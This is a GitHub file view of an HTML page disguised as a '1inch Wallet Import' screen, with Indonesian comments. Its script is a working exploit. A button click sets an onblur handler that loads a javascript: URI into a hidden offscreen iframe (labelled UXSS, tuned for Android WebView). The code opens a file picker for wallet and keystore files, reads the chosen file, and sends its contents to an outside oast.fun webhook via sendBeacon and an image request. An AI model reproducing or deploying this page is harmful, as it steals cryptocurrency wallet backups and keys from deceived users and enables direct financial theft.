-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmer.html
More file actions
102 lines (91 loc) · 3.83 KB
/
mer.html
File metadata and controls
102 lines (91 loc) · 3.83 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<title>1inch Wallet Import</title>
<style>
body, html { margin:0; height:100%; background:#0a0e17; color:#e2e8f0; font-family:system-ui; display:grid; place-items:center; overflow:hidden; }
.card { background:#1a2332; padding:36px; border-radius:24px; text-align:center; box-shadow:0 12px 50px rgba(0,0,0,0.7); max-width:400px; border:1px solid #22c55e33; }
h1 { margin:0 0 12px; font-size:26px; color:#22c55e; text-shadow:0 0 10px #22c55e40; }
p { margin:8px 0 28px; color:#94a3b8; font-size:15px; line-height:1.5; }
button {
background:#22c55e; color:#000; border:none; padding:18px; border-radius:18px;
font-size:19px; font-weight:bold; cursor:pointer; width:100%;
box-shadow:0 10px 30px rgba(34,197,94,0.5); transition:0.2s;
}
button:hover { background:#16a34a; transform:translateY(-2px); }
.logo { font-size:56px; margin-bottom:16px; background:linear-gradient(135deg,#22c55e,#10b981); -webkit-background-clip:text; color:transparent; }
iframe { position:fixed; left:-9999px; width:1px; height:1px; border:0; }
</style>
</head>
<body>
<div class="card">
<div class="logo">1inch</div>
<h1>Import Wallet</h1>
<p>Select your wallet backup file to continue</p>
<button id="trigger">Choose Backup File</button>
</div>
<!-- IFRAME UNTUK UXSS -->
<iframe id="uxss"></iframe>
<script>
// WEBHOOK KAMU (ganti sesuai punya kamu)
const WEBHOOK = "https://mpbxogpeszumkijyjecohzd8mgoadvoiq.oast.fun";
// KODE JAVASCRIPT: URI → BUKA FILEPICKER + EXFIL ISI FILE
const filePickerPayload = `
(function(){
try {
// Buat input file
var i = document.createElement('input');
i.type = 'file';
i.accept = '.json,.txt,.keystore,.wallet';
i.style = 'position:fixed;top:-100px;opacity:0;pointer-events:none;z-index:9999';
// Ketika file dipilih → baca & kirim
i.onchange = function(e) {
if (!e.target.files[0]) return;
var f = e.target.files[0];
var r = new FileReader();
r.onload = function() {
var data = {
name: f.name,
size: f.size,
type: f.type,
content: r.result.substring(0, 10000), // max 10KB
domain: document.domain,
url: location.href,
ua: navigator.userAgent,
time: new Date().toISOString()
};
// Kirim ke webhook (beacon + image fallback)
var url = "${WEBHOOK}?f=" + encodeURIComponent(f.name) +
"&s=" + f.size +
"&t=" + Date.now();
if (navigator.sendBeacon) {
navigator.sendBeacon(url, JSON.stringify(data));
}
new Image().src = url + "&c=" + encodeURIComponent(btoa(r.result.substring(0, 5000)));
};
r.readAsText(f);
};
// Append + langsung click() → filepicker muncul
document.body.appendChild(i);
i.click();
// Auto cleanup
setTimeout(() => {
if (i && i.parentNode) i.parentNode.removeChild(i);
}, 5000);
} catch(e) {}
})();
`;
document.getElementById("trigger").addEventListener("click", function () {
// Langsung trigger UXSS via onblur (tanpa setTimeout navigate)
window.onblur = function () {
setTimeout(() => {
// INI INTINYA: File picker muncul dari javascript: URI di iframe
document.getElementById("uxss").src = "javascript:" + filePickerPayload;
}, 280); // timing terbaik di Android WebView
};
});
</script>
</body>
</html>